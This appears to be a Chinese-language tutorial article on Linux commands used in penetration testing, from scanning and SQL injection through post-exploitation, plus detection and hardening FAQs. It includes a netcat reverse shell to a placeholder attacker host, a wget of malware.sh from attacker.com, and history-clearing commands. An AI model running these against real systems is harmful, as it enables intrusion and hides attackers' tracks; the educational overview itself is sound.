黑客在进行渗透测试或安全研究时,Linux系统因其强大的命令行工具和灵活性成为首选平台,以下是黑客常用的一些Linux命令,涵盖信息收集、漏洞扫描、权限提升、持久化控制等阶段,并附具体使用场景和示例。
(图片来源网络,侵删)
信息收集与侦察
-
nmap:网络扫描和主机发现的核心工具。- 常用参数:
-sS:TCP SYN扫描(隐蔽)-sV:检测服务版本-O:操作系统检测-p-:扫描所有端口(1-65535)
- 示例:
nmap -sS -sV -O 192.168.1.0/24
- 常用参数:
-
netstat/ss:查看网络连接和端口状态。netstat -tulnp:显示监听的TCP/UDP端口及进程IDss -tulnp(推荐,速度更快)
-
whois:查询域名注册信息,了解目标归属。- 示例:
whois example.com
- 示例:
漏洞扫描与利用
-
sqlmap:自动化SQL注入检测与利用。
(图片来源网络,侵删)- 常用参数:
-u:指定URL--dbs:枚举数据库--dump:导出数据
- 示例:
sqlmap -u "http://example.com/page.php?id=1" --dbs
- 常用参数:
-
searchsploit:搜索Exploit-DB漏洞利用代码。- 示例:
searchsploit vsftpd 2.3.4
- 示例:
-
nikto:Web服务器漏洞扫描器。- 示例:
nikto -h http://192.168.1.100
- 示例:
权限提升与持久化
sudo -l:检查当前用户可执行的sudo命令。/etc/passwd和/etc/shadow:手动查看用户密码哈希(需root权限)。crontab -l:检查计划任务,可能被植入恶意脚本。
后渗透与横向移动
-
ssh:远程登录和端口转发。- 示例:
ssh -L 8080:target:80 user@compromised_host(本地端口转发)
- 示例:
-
nc(netcat):网络工具,用于端口监听、数据传输。
(图片来源网络,侵删)- 监听端口:
nc -lvnp 4444 - 反向Shell:
nc -e /bin/bash attacker_ip 4444
- 监听端口:
-
wget/curl:下载文件或与Web服务器交互。- 示例:
wget http://attacker.com/malware.sh -O /tmp/malware.sh
- 示例:
痕迹清理与日志分析
history:查看命令历史记录,黑客常通过history -c清空。cat /var/log/auth.log(Ubuntu)或/var/log/secure(CentOS):分析登录日志。rm -rf ~/.bash_history:删除当前用户的命令历史(不推荐,因日志可能已同步到系统)。
其他实用工具
-
grep:文本搜索,常结合管道使用。- 示例:
cat /var/log/syslog | grep "failed"
- 示例:
-
awk/sed:文本处理和替换。- 示例:
awk '{print $1}' /var/log/access.log | sort | uniq -c
- 示例:
-
john the ripper:密码破解工具。- 示例:
john --wordlist=rockyou.txt hash.txt
- 示例:
常用命令速查表
| 阶段 | 命令/工具 | 主要用途 |
|---|---|---|
| 信息收集 | nmap |
端口扫描、服务识别 |
| 漏洞利用 | sqlmap |
SQL注入自动化攻击 |
| 权限提升 | sudo -l |
检查sudo权限 |
| 横向移动 | ssh/nc |
远程访问、反向Shell |
| 日志分析 | grep/awk |
过滤和提取关键信息 |
FAQs
Q1: 如何判断一个Linux系统是否被黑客入侵?
A1: 可通过以下方式检查:
- 查看异常进程:
ps aux | grep suspicious_process - 检查可疑用户:
cat /etc/passwd | grep "::"(无密码的用户) - 分析登录日志:
grep "Failed password" /var/log/auth.log - 检查网络连接:
netstat -an | grep ESTABLISHED
Q2: 如何防止黑客通过命令行工具攻击?
A2: 防护措施包括:
- 限制sudo权限:使用
visudo配置最小权限原则。 - 定期更新系统:
apt update && apt upgrade(Ubuntu)或yum update(CentOS)。 - 禁用不必要服务:
systemctl disable unused_service。 - 监控敏感命令:通过
auditd工具记录sudo、ssh等操作。
